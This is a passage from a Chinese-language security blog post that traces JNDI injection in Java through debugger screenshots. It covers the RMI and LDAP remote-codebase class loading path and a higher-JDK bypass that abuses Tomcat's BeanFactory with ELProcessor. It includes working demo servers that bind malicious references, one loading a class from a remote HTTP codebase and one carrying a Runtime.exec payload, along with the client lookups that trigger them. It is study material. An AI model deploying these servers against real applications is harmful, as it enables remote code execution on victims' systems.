&#x3D;&#x3D;想问一下wrapper类型的对象到底是什么,感觉好多地方能看到他&#x3D;&#x3D;  )</p>
<p>这里跟进一下服务端，这里就不解释这么详细了，到registry之前的内容做下省略<br><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230427171913.png"><br><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230427172105.png"><br><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230427172202.png"></p>
<p><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230427172438.png"><br>最后是跟到了RegistryContext这里,能够看到他最终是重载了注册中心的rebind方法<br>比较关键的地方是这个encodeObject,光看名字就知道和我们的reference对象加密有关<br>(这个时候能够看到右下角的obj还是个引用对象)<br>跟进 <code>encodeObject</code> 方法<br><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230427173116.png"><br>能够看到这里是用NamingManager.getStateToBind对obj进行了一次处理,再根据obj处理后的类型,将obj给打包起来,加密问题大概就是这样的,接着回到客户端<br>（怕忘了，把当时的进度再贴一遍）<br>跟进一下解密用的decodeObject函数<br><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230427173536.png"></p>
<p>decodeObject这里调用了getObjectInstance函数，光是看名字就知道这位是重量级，得跟进<br>（顺便提一下，现在已经能看到obj被解析回引用类型了）</p>
<p><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230427173953.png"></p>
<p>跟进结果如下，咳咳，原本一位是在第三个断点处返回的对象，但根本没进去，很麻，看了看别的师傅的博客，发现在factory.getObjectInstance就返回了，我们跟进一下getObjectFactory<br><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230427175123.png"><br>这里又是个关键点，他会根据我们所传入的factoryname（服务端的第二个参数）,尝试在本地实例化，如果没实例化成功，则通过codebase所记载的地址去加载factory对象<br><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230427175702.png"></p>
<p>跟进一下最后的loadclass，发现了关键方法，newstance，通过这个方法拿到了我们的恶意类的类对象</p>
<p><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230427180002.png"></p>
<p>拿到类对象后是在这里进行newInstance的，步过一下就会RCE</p>
<p><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230427180907.png"></p>
<h3 id="JNDI与LDAP"><a href="#JNDI与LDAP" class="headerlink" title="JNDI与LDAP"></a>JNDI与LDAP</h3><p>ps : 在8u141以下的版本可复现，工程师当年仅仅修复了RMI和CORBA的问题,把这个给忘</p>
<h4 id="复现Demo"><a href="#复现Demo" class="headerlink" title="复现Demo"></a>复现Demo</h4><p>JndiServer</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">JNDIRMIServer</span> &#123;  </span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> NamingException, InterruptedException &#123;  </span><br><span class="line">        <span class="type">InitialContext</span> <span class="variable">initialContext</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">InitialContext</span>();  </span><br><span class="line">        <span class="type">Reference</span> <span class="variable">reference</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">Reference</span>(<span class="string">&quot;TestRef&quot;</span>, <span class="string">&quot;TestRef&quot;</span>, <span class="string">&quot;http://192.168.239.133:8000/&quot;</span>);  </span><br><span class="line">        initialContext.rebind(<span class="string">&quot;ldap://192.168.239.133:10389/cn=JndiLdap,dc=example,dc=com&quot;</span>,reference);  </span><br><span class="line">        <span class="keyword">while</span>(<span class="literal">true</span>)&#123;  </span><br><span class="line">            Thread.sleep(<span class="number">1</span>);  </span><br><span class="line">        &#125;  </span><br><span class="line">    &#125;  </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>JndiClient</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">JNDIRMIClient</span> &#123;  </span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> NamingException, RemoteException &#123;  </span><br><span class="line">        <span class="type">InitialContext</span> <span class="variable">initialContext</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">InitialContext</span>();         initialContext.lookup(<span class="string">&quot;ldap://192.168.239.133:10389/cn=JndiLdap,dc=example,dc=com&quot;</span>);  </span><br><span class="line">        <span class="comment">//hello.sayhello(&quot;xxxxxx&quot;);  </span></span><br><span class="line">    &#125;  </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>此时此刻的ApacheDirectoryStudio内部详情<br><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230428161109.png"></p>
<h4 id="流程分析"><a href="#流程分析" class="headerlink" title="流程分析"></a>流程分析</h4><p>老样子,在Client处下个断点</p>
<p><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230428161206.png"></p>
<p>进去之后还是老样子,根据调用的协议一步一步找重载lookup,这里省略省略,大体流程和之前类似</p>
<p><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230428161415.png"><br><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230428161450.png"><br><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230428161630.png"></p>
<p><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230428162517.png"><br><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230428162759.png"></p>
<p>这里的c_lookup就已经是最后一层的lookup了，没必要跳了<br>仔细的分析一下里面的情况,查看了一下它的方法字段,发现多了一个obj的属性,估计这个就是我们从ldap服务上所夺取的对象,给他下个断点,后面重点关注一下</p>
<p><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230428163631.png"><br><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230428163751.png"></p>
<p>在这个方法处,我们得到了我们的ref对象,这里是通过attrs解密获得的,在obj.java这里找到了我们<br>的decodeReference方法,最后在这个方法里返回了我们的引用对象</p>
<p><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230428163950.png"><br>回到LdapCtx这里继续分析,在下面这里通过DirectoryManager.getObjectInstance方法,获得工厂对象(这里就是我们的恶意类)<br><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230428164219.png"></p>
<p>在这里获取引用对象所指向的工厂的类对象,跟进一下</p>
<p><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230428164825.png"></p>
<p>唔，和之前是一样的，在本地没有找到相应类，所以这里就从codebase加载对象，这里要是深究一下里面的内容结构的话，会发现他是加载了一个UrlClassLoader（和rmi那个一样）,不深究了，反正就是通过这个方法拿到了一个工厂对象的类对象（TestRef）</p>
<p><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230428164939.png"></p>
<p>拿到类对象以后，实例化了一下，执行构造函数，完成RCE</p>
<p><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230428170049.png"></p>
<h3 id="JNDI的高版本RMI绕过"><a href="#JNDI的高版本RMI绕过" class="headerlink" title="JNDI的高版本RMI绕过"></a>JNDI的高版本RMI绕过</h3><h4 id="复现Demo-1"><a href="#复现Demo-1" class="headerlink" title="复现Demo"></a>复现Demo</h4><p>pom.xml</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?xml version=<span class="string">&quot;1.0&quot;</span> encoding=<span class="string">&quot;UTF-8&quot;</span>?&gt;</span>  </span><br><span class="line"><span class="tag">&lt;<span class="name">project</span> <span class="attr">xmlns</span>=<span class="string">&quot;http://maven.apache.org/POM/4.0.0&quot;</span>  </span></span><br><span class="line"><span class="tag">         <span class="attr">xmlns:xsi</span>=<span class="string">&quot;http://www.w3.org/2001/XMLSchema-instance&quot;</span>  </span></span><br><span class="line"><span class="tag">         <span class="attr">xsi:schemaLocation</span>=<span class="string">&quot;http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd&quot;</span>&gt;</span>  </span><br><span class="line">    <span class="tag">&lt;<span class="name">modelVersion</span>&gt;</span>4.0.0<span class="tag">&lt;/<span class="name">modelVersion</span>&gt;</span>  </span><br><span class="line">  </span><br><span class="line">    <span class="tag">&lt;<span class="name">groupId</span>&gt;</span>org.example<span class="tag">&lt;/<span class="name">groupId</span>&gt;</span>  </span><br><span class="line">    <span class="tag">&lt;<span class="name">artifactId</span>&gt;</span>untitled<span class="tag">&lt;/<span class="name">artifactId</span>&gt;</span>  </span><br><span class="line">    <span class="tag">&lt;<span class="name">version</span>&gt;</span>1.0-SNAPSHOT<span class="tag">&lt;/<span class="name">version</span>&gt;</span>  </span><br><span class="line">  </span><br><span class="line">    <span class="tag">&lt;<span class="name">properties</span>&gt;</span>        <span class="tag">&lt;<span class="name">maven.compiler.source</span>&gt;</span>8<span class="tag">&lt;/<span class="name">maven.compiler.source</span>&gt;</span>  </span><br><span class="line">        <span class="tag">&lt;<span class="name">maven.compiler.target</span>&gt;</span>8<span class="tag">&lt;/<span class="name">maven.compiler.target</span>&gt;</span>  </span><br><span class="line">        <span class="tag">&lt;<span class="name">project.build.sourceEncoding</span>&gt;</span>UTF-8<span class="tag">&lt;/<span class="name">project.build.sourceEncoding</span>&gt;</span>  </span><br><span class="line">    <span class="tag">&lt;/<span class="name">properties</span>&gt;</span>  </span><br><span class="line">    <span class="tag">&lt;<span class="name">dependencies</span>&gt;</span>        <span class="tag">&lt;<span class="name">dependency</span>&gt;</span>            <span class="tag">&lt;<span class="name">groupId</span>&gt;</span>org.apache.tomcat.embed<span class="tag">&lt;/<span class="name">groupId</span>&gt;</span>  </span><br><span class="line">            <span class="tag">&lt;<span class="name">artifactId</span>&gt;</span>tomcat-embed-core<span class="tag">&lt;/<span class="name">artifactId</span>&gt;</span>  </span><br><span class="line">            <span class="tag">&lt;<span class="name">version</span>&gt;</span>8.0.28<span class="tag">&lt;/<span class="name">version</span>&gt;</span>  </span><br><span class="line">        <span class="tag">&lt;/<span class="name">dependency</span>&gt;</span>        <span class="tag">&lt;<span class="name">dependency</span>&gt;</span>            <span class="tag">&lt;<span class="name">groupId</span>&gt;</span>org.apache.tomcat.embed<span class="tag">&lt;/<span class="name">groupId</span>&gt;</span>  </span><br><span class="line">            <span class="tag">&lt;<span class="name">artifactId</span>&gt;</span>tomcat-embed-el<span class="tag">&lt;/<span class="name">artifactId</span>&gt;</span>  </span><br><span class="line">            <span class="tag">&lt;<span class="name">version</span>&gt;</span>8.0.28<span class="tag">&lt;/<span class="name">version</span>&gt;</span>  </span><br><span class="line">        <span class="tag">&lt;/<span class="name">dependency</span>&gt;</span>  </span><br><span class="line">    <span class="tag">&lt;/<span class="name">dependencies</span>&gt;</span><span class="tag">&lt;/<span class="name">project</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>JNDIBPServer</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> com.sun.jndi.rmi.registry.ReferenceWrapper;  </span><br><span class="line"><span class="keyword">import</span> java.rmi.registry.LocateRegistry;  </span><br><span class="line"><span class="keyword">import</span> java.rmi.registry.Registry;  </span><br><span class="line"><span class="keyword">import</span> javax.naming.StringRefAddr;  </span><br><span class="line"><span class="keyword">import</span> org.apache.naming.ResourceRef;  </span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">JNDIBPServer</span> &#123;  </span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception &#123;  </span><br><span class="line">        <span class="type">Registry</span> <span class="variable">registry</span> <span class="operator">=</span> LocateRegistry.createRegistry(<span class="number">1099</span>);  </span><br><span class="line">        <span class="type">ResourceRef</span> <span class="variable">resourceRef</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ResourceRef</span>(<span class="string">&quot;javax.el.ELProcessor&quot;</span>, (String)<span class="literal">null</span>, <span class="string">&quot;&quot;</span>, <span class="string">&quot;&quot;</span>, <span class="literal">true</span>, <span class="string">&quot;org.apache.naming.factory.BeanFactory&quot;</span>, (String)<span class="literal">null</span>);  </span><br><span class="line">        resourceRef.add(<span class="keyword">new</span> <span class="title class_">StringRefAddr</span>(<span class="string">&quot;forceString&quot;</span>, <span class="string">&quot;Sentiment=eval&quot;</span>));  </span><br><span class="line">        resourceRef.add(<span class="keyword">new</span> <span class="title class_">StringRefAddr</span>(<span class="string">&quot;Sentiment&quot;</span>, <span class="string">&quot;Runtime.getRuntime().exec(\&quot;calc\&quot;)&quot;</span>));  </span><br><span class="line">        <span class="type">ReferenceWrapper</span> <span class="variable">referenceWrapper</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ReferenceWrapper</span>(resourceRef);  </span><br><span class="line">        registry.bind(<span class="string">&quot;Exec&quot;</span>, referenceWrapper);  </span><br><span class="line">        System.out.println(<span class="string">&quot;the Server is bind rmi://127.0.0.1:1099/Exec&quot;</span>);  </span><br><span class="line">    &#125;  </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<pre><code>JNDIBPClient
</code></pre>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> javax.naming.*;  </span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">JNDIBPClient</span> &#123;  </span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception &#123;  </span><br><span class="line">        <span class="type">InitialContext</span> <span class="variable">initialContext</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">InitialContext</span>();  </span><br><span class="line">        initialContext.lookup(<span class="string">&quot;rmi://127.0.0.1:1099/Exec&quot;</span>);  </span><br><span class="line">    &#125;  </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h4 id="前情提要"><a href="#前情提要" class="headerlink" title="前情提要"></a>前情提要</h4><p>这里在8u某个版本之后，jdk对于codebase加了一层处理，他会检查一下codebase中传入的url是不是可信任的url,如果是可信任的url就从中加载指定class文件,若不是可信任url则放弃执行<br>具体位置如下</p>
<p><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230429003829.png"></p>
<p>这直接导致我们之前通过codebase加载恶意类的方法失效<br>无论是前面的ldap还是rmi在此都无法使用了<br>最后的解决方案是利用服务器上的Tomcat内置类 <code>BeanFactory.getObjectInstance</code> 实现RCE<br>(getObjectInstance为这里工厂对象默认会调的一个方法)。<br>总而言之,&#x3D;&#x3D;这里的原理是利用将工厂对象设置为BeanFactory这个tomcat内置类来调用里面危险的getObjectInstance方法(里面有method.invoke)&#x3D;&#x3D;</p>
<h4 id="流程分析-1"><a href="#流程分析-1" class="headerlink" title="流程分析"></a>流程分析</h4><p>前面的和之前的分析流程都是一样的，我们直接来到<code>getObjectInstance</code>这里，跟进去看看里面的执行流程<br><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230429235851.png"></p>
<p>熟悉的地方，熟悉的断点，再跟</p>
<p><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230430000246.png"></p>
<p>来到了和之前流程都不一样的一个地方了，之前我们在本地都找不到facrory工厂类，必须得从codebase加载factory，但现在直接就能从本地查到，省去了codebase查找的流程，在这里就能直接实例化出factory的类对象，这里不看了，直接跟进一下<code>facroty.getObjectInstance</code>这个方法</p>
<p><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230430001543.png"></p>
<p>来到了BeanFactory里面<br>它这里先是依据factory的classname属性设定好了<code>beanClassName</code>字段，用于一会儿得到类对象<br>再是通过ref.get方法,得到了forceString的值，这里不知道他这个forceString到底是个什么类型的东西，跟进去get看一看</p>
<p><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230430002324.png"></p>
<p>好吧，只能说是类似于属性的东西吧，这个get方法就很常规的从列表里面取出值而已，没什么价值，我们步出回去</p>
<p><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230430002225.png"></p>
<p>forced是我们的方法集合,这里要记住<br>然后value的值是从ra里面抠出来的,这里经过处理后是<code>Sentiment=eval</code></p>
<p><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230430003143.png"></p>
<p>对value进行一点小小的分离处理,paoname就是<code>Sentiment=eval</code> 等号后面的部分,param就是等号前面的部分，得到forced集合</p>
<p><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230430004750.png"></p>
<p>最后，经过一系列比较复杂的操作(其实也还行，就是取出RefAddr里面不为scope&#x2F;forceString&#x2F;auth.factory的元素而已)，从那个类似属性的集合里面抠出来了方法的参数（<code>Runtime.getRuntime().exec()</code>）交给method.invoke执行，弹出计算器，至此结束<br><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230430011249.png"><br><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230430005921.png"></p>

        
      </div>

         
    </div>
    
     
  </div>
  
    
<nav id="article-nav">
  <a class="article-nav-btn left "
    
      href="/2023/05/04/JDBC%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%AD%A6%E4%B9%A0/"
      title="JDBC反序列化简单审计"
     >
    <i class="fa-solid fa-angle-left"></i>
    <p class="title-text">
      
        JDBC反序列化简单审计
        
    </p>
  </a>
  <a class="article-nav-btn right "
    
      href="/2023/04/11/Jinja2-SSTI-%E6%80%BB%E7%BB%93/"
      title="SSTI常用Payload"
     >

    <p class="title-text">
      
        SSTI常用Payload
        
    </p>
    <i class="fa-solid fa-angle-right"></i>
  </a>
</nav>


  
</article>

 
    </div>
    <div id="footer-wrapper">
      <footer id="footer">
  
  <div id="footer-info" class="inner">
    
    &copy; 2026 F4miti0n<br>
    Powered by <a href="https://hexo.io/" target="_blank">Hexo</a> & Theme <a target="_blank" rel="noopener" href="https://github.com/saicaca/hexo-theme-vivia">Vivia</a>
  </div>
</footer>

    </div>
    <div class="back-to-top-wrapper">
    <button id="back-to-top-btn" class="back-to-top-btn" onclick="topFunction()">
        <span class="material-symbols-rounded">keyboard_arrow_up</span>
    </button>
</div>

<script>
    function topFunction() {
        window.scroll({ top: 0, behavior: 'smooth' });
    }
    let btn = document.getElementById('back-to-top-btn');
    function scrollFunction() {
        if (document.body.scrollTop > 600 || document.documentElement.scrollTop > 600) {
            btn.style.opacity = 1;
        } else {
            btn.style.opacity = 0;
        }
    }
    window.onscroll = function() {
        scrollFunction();
    }
</script>

  </div>
  <script src="/js/light-dark-switch.js"></script>
</body>
</html>
